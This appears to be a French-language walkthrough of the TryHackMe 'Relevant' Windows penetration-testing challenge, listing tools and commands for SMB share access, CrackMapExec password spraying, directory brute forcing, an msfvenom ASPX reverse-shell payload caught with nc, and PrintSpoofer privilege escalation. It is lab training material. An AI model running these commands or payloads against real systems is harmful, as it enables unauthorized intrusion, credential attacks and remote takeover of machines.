**Relevant (THM Penetration Testing Challenge)**

Difficulty: Medium

Ce 20/01/2022

**OS**: _Windows_

<details><summary>Outils:

</summary>
smbclient : SBM est un protocole de partage de fichier utilisé par les systemes windows( port 139 or 445). Il marche aussi pour les systemes LINUX.

L'outil `smbclient` de linux permet d'interagir avec les partages effectuer vers un serveurs distant.

**-L** Dans l'exemple suivant, nous listons les partages fournis par l'adresse IP 192.168.1.10.

`smbclient -L 192.168.1.10`

Pour se connecter au serveur via sbm:

`smbclient @ip_hote_serveur -U username`

On peut repertorier les partages de fichier en fournissant un nom d'utilisateur:

`smbclient -L @ip_hote_de_partage_de_fichier -U ismail`

De même, les fichier d'un sous repertoire; Dans l'exemple suivant, nous listons le contenu de 

"\Backup\2021".


`smbclient -L \\fileserver\Backup\2021`

Acceder au contenu d'un repertoir de façon anonyme

`smbclient //10.10.6.121/nt4wrksv`

[Plus sur sbmclient](https://linuxtect.com/linux-smbclient-command-tutorial/)



**CrackMapExec** (alias CME) est un outil de post-exploitation qui permet d'automatiser l'évaluation de la sécurité des grands réseaux Active Directory.

_Pour utiliser une exécution de protocole spécifique_

`cme <protocol> <protocol options> @ip`

_Utilisation des informations d'identification_

`crackmapexec <protocol> <target(s)> -u username -p 'Admin!123@'`

ou ( pour les cas où les entrées sont précédées de "-" )

`crackmapexec <protocol> <target(s)> -u='-username' -p='-Admin!123@'`


_Utilisation d'un ensemble d'informations d'identification de la base de données_


`crackmapexec <protocol> <target(s)> -id <cred ID(s)>`


_Brute Forcing & Password Spraying_


En spécifiant un fichier ou plusieurs valeurs, CME forcera automatiquement les connexions par force brute pour toutes les cibles utilisant le protocole spécifié :

`crackmapexec <protocol> <target(s)> -u username1 -p password1 password2`


`crackmapexec <protocol> <target(s)> -u username1 username2 -p password1`


`crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -p ~/file_containing_passwords`


`crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashe`


<details>
<summary>_Utiliser des modules:_</summary>

_Listez-les_

`cme <protocol> -L`

Pour exécuter un module

`cme <protocol> <target(s)> -M <module name>`
</details>


[Plus sur CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec/blob/master/README.md)

**printspoofer** 

PrintSpoofer exploit that can be used to escalate service user permissions on Windows Server 2016, Server 2019, and Windows 10.
To escalate privileges, the service account must have SeImpersonate privileges. To execute:

`PrintSpoofer.exe -i -c cmd`

[ --> Plus sur printspoofer](https://github.com/dievus/printspoofer)

[--> SBM exploit avec metasploit ](https://www.editions-eni.fr/open/mediabook.aspx?idR=8cc2909910ffc7cae3542ccff65dc3d5)


<details><summary>threader3000</summary>

Outils python qui permet un scannage massif des ports

Lancer `threader3000`

[Treader github](https://github.com/dievus/threader3000)

</details>

<details><summary> dirsearch</summary> est un outil de fouille des repertiores et fichiers sur des serveurs

`dirseach -u @ip -E -x 400,500 -r -t 50 -w worldlist`

[dirsearch github ](https://github.com/maurosoria/dirsearch)

L'option `-t` designe thread et doit etre modifié à des fin spécifique, `-x` prend les flage de retour à ignorer

</details>

<details><summary>psexec.py</summary> permet de s'assurer de la validé des identifiant:

_Usage:_  `psexec.py user_name:'password'@ip_server`

</details>

**NB:** Pour envoyer un fichier sur un serveur via sbm: `put file_name`
Il faut d'abord se connecter sur le serveur `smbclient \\@ip\\directory`

**Note challenge:**

Windows IIS nécessite généralement un shell aspx,nous en fabriquons un avec msfvenom:

`	msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f aspx > shell-x64.aspx `

[Payload avec msfvenom ](https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/)

N'oublier pas de mettre votre box en ecoute avec `nc` et executer le payload avec `curl` suivi du chemain http

Utiliser `Printspoofer` en etant _ SeImpersonate_ pour elever les privilèges.

On télécharge Printspoofer sur la machine avec `put` et executer `Printspoofer -i -c cmd`
</details>





